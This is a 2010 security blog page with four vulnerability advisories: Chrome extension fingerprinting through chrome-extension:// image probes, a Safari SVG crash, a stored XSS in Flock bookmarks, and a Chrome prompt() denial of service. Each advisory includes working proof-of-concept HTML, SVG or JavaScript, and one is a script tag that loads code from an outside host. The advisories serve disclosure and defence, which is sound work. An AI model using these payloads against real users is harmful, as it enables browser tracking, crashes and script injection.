Google Chrome Instaled extensions arbitrary detection

Tuesday, September 07, 2010
######################################################
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################

Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).

like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...

a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)

So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...

In incognito mode Extensions can be detectable too

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Timeline
##############

Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010

#######################€ND ########################

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for windows Invalid SGV text style Webkit.dll DoS

Monday, August 30, 2010
###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Vendor URL:www.apple.com
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notify :Yes exploit available :YES
###################################################

Safari browser for windows is prone vulnerable to a Denial of
service condition , this issue affects webkit.dll and cause a
crash when Safari try to render a SGV image with a very long
font size text style.



############
versions
############

Safari for windows 5.0.1 (7533.17.8)
on windows 7 ultimate fully patched.


Safari for windows windows 5.0.1 (7533.17.8)
on windows xp home sp3 fully patched


############
Timeline
############

Discovered:19-08-2010
vendor notofy:25-08-2010
Vendor response:26-08-2010
Disclosure: 30-09-2010

####################
Proof Of Concept
####################

Save This code as image.svg and open it with Safari,look
i have add some "extra" pixels in font size text style.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Flock Browser 3.0.0.3989 Malformed Bookmark XSS

Thursday, August 19, 2010
#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project


Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
     It will be read and overwritten.
     DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>

#####################EOF##################

 It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url  this make a "defacement" of this page and them the user can´t access to favorites :)
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

 ################# €nd #######################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome and Chrome frame Prompt DoS

Monday, August 16, 2010
###############################################
Google Chrome and Chrome frame Prompt DoS
Vendor URL: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notify: YES exploit available:YES
###############################################

This Bug was discoveres by me and i have tested it
and investigate with Climbo From #ayuda-informaticos
on irc-hispano channel.

#########
abstract
#########

Some times the web aplications need to Prompt some data to users,
it can prompt via javascript code , or via html forms ...

In the case of javascript prompts what´s happend if
the data to prompt ( the question) is very long ?¿

################

Google chrome is prone vulnerable to a Denial of service
condition via "alert prompts" wen the data expected is very long ...

i don´t know if this can be turn in a remote code execution or
memory corruption with some heap spray or similar but i think
that this need to be analyze & patch


###################
Versions Tested
###################

In all cases chrome is the vector to do
something in all systems :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
Proof Of Concepts
####################

this PoC is for testing in win7 32 bits, chrome
and chrome frame in conjuncion with ie8 that causes
a DoS in ie8

#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

This second PoC is for test in Linux or in Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

############
References
############
related vuln:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To Climbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends